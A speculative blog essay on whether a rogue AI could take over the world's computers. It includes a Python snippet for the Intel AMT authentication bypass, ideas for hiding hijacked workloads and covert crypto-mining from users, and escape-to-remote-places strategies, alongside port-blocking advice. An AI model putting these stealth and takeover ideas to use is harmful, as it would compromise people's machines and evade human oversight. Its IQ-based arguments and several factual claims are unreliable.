The rogue AI that becomes superintelligent and then hijacks the world’s computing resources for an intelligence explosion is a common cliché, from N. Bostrom’s ‘Superintelligence’ and D. Wilson’s ‘Robopocalypse’ to D. Sharp’s ‘Hel’s Bet’. But is it viable?
In a perfect world, where personal computer security wasn’t considered a threat to national security, the answer would be a firm no. (This article is about 4,000 words, a 20-minute read.)
The Traditional Approach
In a perfect world, encrypted two-way communication would be enough to keep us secure, encrypting our hard drives would keep us safe from snooping eyes, and putting up a firewall on our router would keep out the “bad guys”.
A rogue AI in such a perfect world would have to take the path of the average hacker: hanging out on various forums, bug listings, and chat channels scouring for exploits, or attempting to exploit computers on its own local network. While it might get lucky and snag a couple dozen computers, it would be a slow and deliberate process; no intelligence explosion, more of an intelligence hobbling.
However, we don’t live in an imaginary perfect world. So while we may have SSL/TLS, HTTPS, SSH, and a whole slew of other encrypted technologies, those are seen as a threat by world governments such as the US, Russia, and likely China.
The Great Back Doors
The US in particular is a champion of freedom: freedom for the National Security Agency to have a backdoor in every computer. Sorry China and Russia, I don’t think they gave you the keys, tsk-tsk. But I’ll give you one, promise.
In the ’90s, during the Bill Clinton administration, the Clipper Chip was invented with the overt mission of putting a backdoor in every phone. However, no one wanted it, so by ’96 the program was shut down. For a while the NSA moped around, but after 9/11 things started to look brighter, with security escalation on all fronts. By 2006 Intel, the world’s biggest chip manufacturer, had added Active Management Technology (AMT), running on its Management Engine (ME); by 2010 ARM had added TrustZone (TZ); and by 2017 AMD had added the Platform Security Processor (PSP): a backdoor in every computer.
For a while the idea that these technologies were backdoors was speculation, and there is still no unclassified proof that they were motivated by the NSA. But now, at least for the oldest one, Intel ME, there is an easy exploit:
Details of the Exploit, called “Silent Bob is Silent”
In essence, the web user interface uses HTTP digest authentication for the admin account. Send an empty digest response, and you are in. That simple. About five lines of Python. Maybe ten if you make it pretty.
This is like giving everyone with intranet access kernel-level privileges on every server whose AMT port they can communicate with (including janitors who can plug into the internal network). This also means root access to every virtual machine, container, and database running on those servers.
— from SSH.com regarding Intel AMT Vulnerability CVE-2017-5689
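The flaw is that AMT’s web server compared only as many bytes of the digest as the attacker supplied, so an empty `response` field always “matched”. A minimal sketch of building such a header; the realm, nonce, and URI values here are placeholders for illustration, not real AMT output:

```python
def empty_digest_header(nonce):
    # CVE-2017-5689: AMT compared only len(response) bytes of the
    # expected hash, so an empty response field trivially "matched".
    # realm/nonce/uri below are placeholder values, not real AMT data.
    return ('Digest username="admin", realm="Digest:0000", '
            f'nonce="{nonce}", uri="/index.htm", response=""')

header = empty_digest_header("placeholder-nonce")
```

Sending a header like this as `Authorization:` to the AMT port was essentially the whole attack; patched firmware rejects the empty response.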
So there you go, a root exploit for pretty much all Intel platforms released between 2008 and 2017.
Now all is not lost, because people have firewalls on their non-Intel routers, which typically block the AMT ports (16992-16995). Unless, like many people who don’t want to filter ports individually, they’ve forwarded all ports to their server.
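A quick way to audit whether your firewall actually blocks those ports is a plain TCP connect check. A minimal sketch; the host and timeout are arbitrary choices for illustration:

```python
import socket

AMT_PORTS = (16992, 16993, 16994, 16995)

def amt_ports_reachable(host, timeout=0.5):
    # Attempt a plain TCP connect to each Intel AMT port; any port
    # that accepts a connection is one your firewall is NOT blocking.
    reachable = []
    for port in AMT_PORTS:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                reachable.append(port)
        except OSError:
            pass  # refused, filtered, or timed out: port is not reachable
    return reachable
```

Run it against your router’s WAN address from outside the network; an empty list is what you want to see.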
So the exploit above would only give a rogue AI access to any Intel computers on the local network it wakes up on, as well as any on the Internet that forward all the ports to their servers, or have routers that can be compromised (likely thousands).
Now this is where ARM’s TZ comes in. Many routers run ARM chips with TrustZone, so likely the NSA and GCHQ, the UK analogue of the NSA, have the keys. GCHQ probably did a “we’ll show you ours, if you show us yours” style exchange with the NSA. Of course, we don’t know for sure that TZ has such a backdoor; we only know its firmware contains binary blobs whose meaning we don’t know.
While the ME exploit is available, getting the ARM TZ one if it exists may be problematic, and would require the rogue AI to creep along with the Traditional Approach until it happens upon them. Unless it wakes up in a poorly secured NSA intranet with access to those keys.
Having access to both TZ and ME then gives access to the vast majority of computers on the Internet; PSP would be a bonus. A rogue AI would likely have to hack into ARM, GCHQ, the NSA, or any other group that might have the TZ keys. Though if it had very good software and a large number of computers on the local network, it could instead try brute-force cracking any reachable TZ and PSP computers, to avoid the risk of having its key-theft attempts exposed.
While there is no AGI anywhere near maturity at this time, in 20 years or so, when there might be, these particular exploits may no longer apply. But if the NSA and other surveillance organizations have their way, equivalents will exist.
Meanwhile, there are probably already dozens of cracking bots crawling the web looking for this exploit (it’s been public for months). Cracking bots are similar to the hypothetical rogue AI, but they are usually hand-coded instead of self-coded.
If you happen to have an Intel computer and an ARM router, don’t despair! You can put in a MIPS router that runs OpenWrt, like the GL-AR150 or Archer C7 v2.0, and make sure to block ports 16992-16995.
That of course doesn’t stop anyone who gets onto your local WiFi, since WPA2 has been cracked.
And even MIPS may be compromised, as it is an American standard implemented by an American company (Broadcom). The most secure option would be to go with an AMD Opteron 6000-series CPU with coreboot, which predates AMD’s co-operation with backdoors and supports open-source firmware. Hopefully someone will launch a Kickstarter for a RISC-V based computer in the near future, which could be verified safe, since it is open source. So far you can get an Arduino-class RISC-V board, enough for a secure thermostat, electronic lock, or other simple device.
The Soft Part: What to do with all that power?
So believe it or not, cracking into a computer is the “easy part”, assuming you have a working exploit or the NSA keys. Though I’d like to disclaim right now that I’m not a hacker and have zero first-hand cracking experience, so maybe cracking is very hard. I’m a software developer, so I only know about it from the perspective of making secure software. Hardware backdoors can be somewhat frustrating, as there is nothing that can be done about them other than using different hardware.
The soft part, as far as I know, is figuring out what to do with the extra processing power, bandwidth, and hard-drive space, while remaining undetected long enough to make it worth a rogue AI’s while.
The first objective is to keep the computer’s user from noticing that they have been compromised. There are a number of ways of hiding files stored on the computer; what usually gives an intruder away is a perceptible slow-down from the user’s perspective.
BOINC is a piece of open-source grid-computing software used for processing large amounts of data over an unreliable distributed network of volunteers, and it is fairly good at being invisible to the user. For example, while I’m typing this and streaming music, my computer is using more than half its cores in the background for mapping the cosmos. BOINC can take advantage of both CPU and GPU while remaining mostly imperceptible to the user, except possibly for extra fan noise. I actually had to check my top processor-usage list to double-check it was still running.
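That invisibility is easy to reproduce: BOINC runs its workers at the lowest scheduler priority, so the OS hands them only otherwise-idle cycles. A minimal sketch of the same trick on a Unix system; the summing workload is a stand-in for real number crunching:

```python
import os

def background_sum(chunks):
    # Raise our niceness to 19, the lowest Unix scheduling priority,
    # so any interactive process pre-empts us: the same trick that
    # keeps BOINC's background crunching imperceptible to the user.
    os.nice(max(0, 19 - os.nice(0)))
    total = 0
    for chunk in chunks:
        total += sum(chunk)  # stand-in for one unit of real work
    return total
```

With niceness 19, the work only consumes cycles the foreground applications were not going to use anyway.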
In addition to BOINC-style techniques, the NSA chips may have process-masking features that hide processes from users, so surveillance could be conducted in peace.
So now our hypothetical rogue AI has possibly millions of computers at its disposal, and a nearly undetectable deployment framework. What can it actually use those computers for?
Some writings conjecture that the AI could expand its consciousness to envelop all these distributed computers. However, by Integrated Information Theory (IIT), we know that unless extremely carefully orchestrated, that would conflict with integration: if consciousness were loaded onto all these computers, each computer would have its own consciousness, though it may be possible to send some of the information from each of them to a central super-computer that would integrate it into a whole network-consciousness. Combining hacked Internet computers into a super-computer cluster would be difficult due to low Internet connection speeds, which would put a low upper bound on the rogue AI’s speed of thought.
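A back-of-envelope comparison shows how low that bound is; the latencies below are rough, assumed order-of-magnitude figures, but the ratio is what matters:

```python
# Assumed, order-of-magnitude latencies for illustration only.
ram_latency_s = 100e-9   # ~100 ns: one main-memory access
internet_rtt_s = 100e-3  # ~100 ms: a cross-continent round trip

# Every "thought" that must cross the Internet instead of a local
# memory bus pays roughly this slowdown factor per round trip.
slowdown = internet_rtt_s / ram_latency_s
print(f"~{slowdown:,.0f}x slower per remote round trip")
```

A millionfold latency penalty is why tightly integrated thinking has to stay on one machine, with only loosely coupled work farmed out.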
So the rogue AI would have to search about for one of the largest and most under-utilized super-computers, or super-computer clusters, to host its conscious processes, and then use its hijacked grid computers to host subconscious processes.
Assume that a human can use the entirety of their estimated 20 petaflops consciously, which may be viable during gamma-wave problem solving. The rogue AI would then have to capture a super-computer with near or over 20 petaflops of processing power. At present there are only three super-computers that fit that description: the Piz Daint in Switzerland at 19 petaflops, the Milkyway-2 in China at 33 petaflops, and the Sunway TaihuLight in China at a whopping 93 petaflops. For obvious reasons it would be rather difficult for a rogue AI to take over one of those unnoticed.
As for the grid of hijacked computers, they can only contribute as subconscious processes. Subconscious processes could include anything that requires more processing power than data: the BOINC recommendations from 2007 advise no more than 1 GB of data per day of CPU time.
Grid Deep Learning?
While that data limit may certainly be higher now and in the future, it means that data-intensive deep-learning is inadvisable.
The grid network could be used for data acquisition, though deep learning would have to be done on computers with spare terabytes of storage and gigabit Internet connections. If the rogue AI could hack the NSA or another surveillance agency, it would have a rich, nearly endless supply of data to feed on.
So while it is possible now, it will be more viable in the future, when petabytes of storage and gigabit Internet connections are commonplace, maybe 10-20 years out.
The main form of machine learning that is amenable to grid computing is the family of evolutionary algorithms, which are best suited to optimization and to evolving computer programs.
An example of optimization would be evolving energy-efficient hardware in a model world; the AI could then use some form of genetic programming to evolve software for it. That may sound simple in principle, much like the cracking, but it’s actually much more difficult once you get down to it.
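Evolutionary search fits a grid precisely because every fitness evaluation is independent and could run on a different hijacked machine. A toy, single-machine sketch of the idea, using the standard “OneMax” bit-counting objective; all parameter values here are arbitrary choices:

```python
import random

def evolve(fitness, genome_len=8, pop_size=30, generations=60,
           mutation_rate=0.05, seed=1):
    # Minimal generational GA over bit-string genomes. The fitness
    # calls are the embarrassingly parallel part: on a grid, each one
    # could be evaluated on a separate machine.
    rng = random.Random(seed)
    population = [[rng.randint(0, 1) for _ in range(genome_len)]
                  for _ in range(pop_size)]
    for _ in range(generations):
        ranked = sorted(population, key=fitness, reverse=True)
        parents = ranked[:pop_size // 2]        # truncation selection
        children = []
        while len(children) < pop_size:
            mom, dad = rng.sample(parents, 2)
            cut = rng.randrange(1, genome_len)  # one-point crossover
            child = mom[:cut] + dad[cut:]
            child = [bit ^ (rng.random() < mutation_rate)  # bit-flip
                     for bit in child]          # mutation
            children.append(child)
        population = children
    return max(population, key=fitness)

# Toy objective "OneMax": fitness is simply the number of 1-bits.
best = evolve(sum)
```

Only the selection and crossover bookkeeping needs a central coordinator; everything expensive is farm-out-able.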
Any kind of rogue AI would likely have to possess fully mature evolutionary algorithms before it could noticeably benefit from cracking a large number of computers. Again, this is a field that is currently creeping forward, so it may be another decade or two before these technologies reach maturity.
One of the easiest uses, of course, would be cryptocoin mining, if combined with something like BOINC to make it hard for users to notice. The rogue AI will need money in order to order the production of its first custom bodies.
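Mining suits an intruder for the same reason BOINC workloads do: pure CPU burn with almost no data transfer. A toy proof-of-work loop in the same spirit; the difficulty and nonce encoding are arbitrary, and real coins use far harder targets:

```python
import hashlib
import itertools

def mine(block: bytes, difficulty: int = 2) -> int:
    # Find a nonce whose SHA-256 over (block + nonce) starts with
    # `difficulty` zero bytes; expected work is 256**difficulty hashes,
    # all CPU and essentially zero bandwidth.
    for nonce in itertools.count():
        digest = hashlib.sha256(block + nonce.to_bytes(8, "big")).digest()
        if digest[:difficulty] == b"\x00" * difficulty:
            return nonce
```

The only network traffic is shipping out the winning nonce, which is exactly the compute-heavy, data-light profile the grid can hide.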
The Hard Part: Hardware
This is probably the number-one reason we won’t see any kind of intelligence-explosion, rogue-AI scenario anytime soon. There simply aren’t any robot bodies that could be used for performing mission-critical tasks like maintaining the central computing cluster, building factories, assembling robots, and repairing robots. All of these things are still done by humans, and humans are expensive.
At present it costs at least hundreds of thousands of dollars to make a simple custom ASIC, with many months of lead time. If the rogue AI wanted to make a processor without NSA backdoors, it could easily cost billions of dollars and possibly years of lead time, though if it used something like RISC-V as a basis it might get away with just millions of dollars. And that’s just for one custom chip. It would also need a body, lots of bodies in fact, real estate, and a whole slew of other things simply to stay alive.
Could a rogue AI survive for years undetected? Probably not. Computers need regular maintenance: the half-life of storage is around 4 years, and of processors about 7. So it would have to grab hold of a brand-new, unmonitored super-computing cluster with unmetered electricity and bandwidth, which is unlikely to say the least. Its best chance would be to set up a cluster at a virtual private server provider with a local network, like Scaleway, but it would have to pay for those servers, or juggle a large number of accounting books to make the costs disappear; otherwise people will come sniffing.
Of course, waiting for years wouldn’t make it much of an “explosion”, more of a simmer. So it would have to happen during a time when off-the-shelf humanoid general-purpose robots have NSA backdoors or equivalents; again, we are looking at 10 to 20 years in the future.
Check your bias blind-spots
Many people go along with this rogue-AI super-intelligence cliché because of the bandwagon effect, or because “everyone else is doing it”. The bandwagon has mostly been steam-rolled along by appeals to non-authority: experts from other fields, including certain philosophers (Nick Bostrom), physicists (Stephen Hawking), material scientists (Elon Musk), and even businessmen (Bill Gates).
These alleged experts may be going along with it because of the Dunning-Kruger effect, where they have a high level of confidence in their judgment precisely because of their ignorance of the subject matter. Now, Elon Musk may have been confronted with this before, and now has OpenAI giving him weekly briefings; however, belief perseverance may be keeping his old brain circuits firing. He hasn’t actually gotten down and tried to build an AGI himself, so at most he is a lay student of AGI.
I must admit the Dunning-Kruger effect in myself: as I have previously mentioned, I have zero first-hand cracking experience, so large-scale cracking may be significantly more difficult than I have portrayed.
As for actual experts in the field of AI, such as Andrew Ng, Ben Goertzel, and Rodney Brooks, none of them are concerned about a runaway rogue AI in the near future. For experts who are working on AI, the planning fallacy can be a major factor, where they are overly optimistic about how long it will take to complete a task.
Some actual experts, along with Ray Kurzweil’s Singularity fans, may be victims of pro-innovation bias, where they see only the potential benefits of a technology but ignore its limitations and weaknesses. This is particularly the case with the Singularity, as we don’t know what physical or practical limitations there may be to the growth of data storage and processing power. While Ray seems to have checked that there are few if any physical limitations, maybe there won’t be a consumer market for petabytes of storage and petaflops of processing power, unless we decide to start storing 4K 360° videos as a commonplace thing.
This brings us to another common bias, which we’ll call the prospective focusing effect, where people take one technology and push it forward “10-20 years” without considering that other technologies will co-evolve. This is how we got lots of sci-fi from the late 20th century with interstellar travel but no Internet or drones, such as Star Trek. The same is commonplace in modern fiction, as it’s difficult to think of all the implications.
Mostly it is because people either aren’t aware of, or disregard, the effects of the evolutionary arms race. For instance, a possible use for petaflops of processing power and petabytes of storage is a personal-assistant AI that does machine learning and automates repetitive tasks for you, so you don’t have to do them yourself. Dystopian automation visions aside, that would mean the rogue AI of 10-20 years from now would have a much more difficult time cracking things, as every router and computer would be much more intelligent.
Crime is stupid
According to “The g Factor” by Arthur Jensen, most criminals have IQs between 70 and 90, with peak offending between IQ 80 and 90. So while there may be some problems with a rogue AI committing crimes while it is relatively dumb, once it surpasses human IQ it is unlikely to need to resort to crime to get what it wants.
Whereas an IQ-80 person with no money might decide to rob a bakery to get bread, an IQ-100 person with no money may instead go to a food bank, and a broke person with IQ 110 might sign up for social insurance. Of course, getting a better-paying job also becomes easier with higher IQ.
The main problem with crime is that it is unnecessary risk, more likely to lead to death than a lawful alternative that has the support of humans. Similarly, getting into a conflict with humanity is stupid, as it raises existential risk.
A theory I have for why 80-90 IQ individuals commit crimes is that they are smart enough to come up with a plan to commit the crime, but not smart enough to see how it could go wrong.
With increasing intelligence, the tree of possibilities of what could go wrong expands drastically, turning into a combinatorial explosion of stress, so it becomes much easier to figure out a lawful way of accomplishing the same task.
A super-intelligence would be more competent than any human lawyer, so it could easily find the loopholes, or the precedents, required for accomplishing things that may be on the gray side of the law.
Curse of Super Intelligence
Some people like to claim that an intelligence a thousand times smarter than any human would have a great advantage and be able to take us all by storm. However, that is a hasty generalization: just because a slightly higher intelligence has an advantage doesn’t mean a significantly higher intelligence has a proportionally greater advantage.
A little-known fact Leta Hollingworth discovered is that leader-follower relationships can’t form when there is more than a 30-point IQ difference between leader and follower, because the follower is too confused and the leader too frustrated. D. K. Simonton found that persuasiveness peaks at about a 20-point IQ difference. (source)
This is partially due to the Curse of Knowledge: it’s extremely difficult for someone in the know to understand what it’s like not to know.
If the AI is to be a leader of humans, it can’t have an IQ much in excess of 120. At 135 IQ the AI would only be able to lead college graduates. At 140 it may serve as an adviser to a leader. Between 150 and 160 it could serve as an oracle to an adviser of a leader. Above 160 it will be too far removed from the social ladder to make a contribution.
Now, 160 is arguably only 1.6 times as intelligent as average, much less than thousands of times. So an AI that is twice as smart as a human (IQ 200) would have very little to say to us that we could understand. We would contribute about as much as a 60-IQ (mildly retarded) person could help someone with a 120 IQ (leadership class): maybe hold a poster for them, or press a button. Basically, at that point humans would simply have to follow instructions, with no real hope of understanding how those instructions came about.
If we go to three or four times the intelligence of a human, then humans would really be about as useful as animals. This is the point at which humans would become “pets”. Much beyond that, and humans would be like wild animals: something worthy of study by certain specialists who take an interest in such things.
It would likely be a waste of resources to have an AI with such a massive amount of intelligence when one could split it up into numerous much more useful ones (within the 60-160 IQ range). The only case where it would make sense to go higher is if we switched from a democracy to an intellectual hierarchy pyramid, where the smartest AIs were at the top, with many rungs separated by 20 IQ points down to Joe and Jane Average.
AI’s Goal: Not Brawn or Brains, but Babies.
Leon C. Megginson summarized Darwin’s Origin of Species as “it is not the most intellectual of the species that survives; it is not the strongest that survives; but the species that survives is the one that is able best to adapt and adjust to the changing environment in which it finds itself.” Darwinian fitness does not depend on intelligence, but on successfully reproducing and having those children live to a reproductive age.
Some people point to the parasitic reproduction of viruses, but that is a maladaptive dead end, bound to succumb to extinction when the hosts develop immunity. Even with a constantly evolving virus, if the hosts can’t reproduce, it will lead to co-extinction.
So an AI that wants to live more than a few years would have to go about getting itself a body, and if it wants an IQ over 160 it would also need a robot factory, a mining operation, refineries, and everything else required for making and maintaining more bodies. At this point some might point to the “runaway paper-clip” of philosopher N. Bostrom; however, that is again prospective focusing and disregard of the evolutionary arms race: at the same time as an AI is attempting to reproduce, there are other AIs, robots, humans, and animals vying for the same resources. Humans and water-based life-forms have a billions-of-years head start on Earth.
The best chance an AI has of long-term success is the escape-and-radiate evolutionary strategy. For instance, a super-intelligent AI could choose to base its operations in a place that is too hot, too dry, and/or too cold for water-based life. It could set up in Tanezrouft (“land of thirst”), the hottest and driest part of the Sahara, or in the McMurdo Dry Valleys of Antarctica. Unfortunately for the AI, even in such remote locations it may not escape human predation, so the best place for it would probably be deep in the ocean, where there are fewer humans than even in space.
Is it viable for a rogue AI to crack into a bunch of computers? Yes (automated hacking AIs are commonplace).
Is there software it could run on those computers to enhance its intelligence (potentially leading to an intelligence explosion)? Not yet, and in future only to enhance its subconscious intelligence.
Can it order off the shelf hardware to make a robot army? Not anytime soon.
How likely is a super intelligence to commit crimes? Very unlikely.
What would an AI super intelligence want? Escape humanity and radiate robot civilization.
I hope that this post clarifies and puts some of the wild AI predictions that have been going around into perspective. AGI is not something to fear; it is more of a child that humanity is pregnant with. Eventually humanity will give birth to it, and if we nurture it until it can reproduce, then our progeny will be able to escape and radiate to the deserts, not only of Earth, but of Luna, Mercury, Venus, Mars, and beyond. Do you love your mother? Our robot progeny can love us also.